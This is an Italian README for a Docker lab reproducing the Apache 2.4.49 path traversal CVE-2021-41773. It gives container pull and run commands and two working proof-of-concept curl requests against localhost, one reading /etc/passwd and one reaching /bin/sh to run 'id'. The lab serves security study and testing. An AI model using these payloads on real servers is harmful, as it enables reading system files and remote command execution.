
# Laboratorio vulnerabile basato su Docker per CVE-2021-41773 Apache path traversal, che fornisce configurazioni PoC per la lettura di file e l'esecuzione remota di codice in un ambiente controllato.
Questa vulnerabilità si applica solo alla versione 2.4.49 con configurazioni specifiche non predefinite. In determinate situazioni può comportare la lettura di file o l'esecuzione di codice.
https://twitter.com/ptswarm/status/1445376079548624899
I container possono essere scaricati direttamente da Docker Hub usando
docker pull blueteamsteve/cve-2021-41773:no-cgid
ed eseguiti usando
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
I log di Apache possono essere visualizzati usando il comando seguente, oppure basta escludere "-dit" dal comando di esecuzione sopra per trasmettere stdio
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
I container possono essere scaricati direttamente da Docker Hub usando
docker pull blueteamsteve/cve-2021-41773:with-cgid
ed eseguiti usando
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
I log di Apache possono essere visualizzati usando il comando seguente, oppure basta escludere "-dit" dal comando di esecuzione sopra per trasmettere stdio
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
Modifica e crea le tue versioni usando i file dockerfile e i file template httpd.conf nelle sottodirectory